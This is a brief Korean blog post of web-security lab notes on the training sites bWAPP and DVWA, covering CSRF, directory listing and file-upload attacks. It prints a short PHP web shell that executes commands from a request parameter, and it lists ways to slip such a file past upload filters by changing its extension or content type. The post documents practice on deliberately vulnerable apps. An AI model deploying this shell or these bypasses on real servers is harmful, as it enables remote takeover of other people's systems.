웹 보안 실습 3 Posted Nov 23, 2024 By many 1 min readCSRFBWAPP 사이트 / DVWA 사이트Get으로 새로운 패스워드를 전달하기때문에 취약함디렉토리 리스팅BWAPP 사이트 / DVWA 사이트 웹쉘코드simple_cmd.php 코드G-Security Webshell<body bgcolor=#000000 text=#ffffff "> $cmd = $_REQUEST["-cmd"];?> if($cmd != "") print Shell_Exec($cmd);?> </body>metasploit 코드생성실습BWAPP 사이트mediumphp -> php3로 바꿔서 업로드버프스위트로 콘텐츠 타입 변경확장자를 .jpg로 변경URL 인코딩 (업로드는 되나 실행 실패)DVWA 사이트low medium버프스위트로 콘텐츠 타입 변경확장자를 .jpg로 변경 정보보안, 웹 보안 IT Security Web Share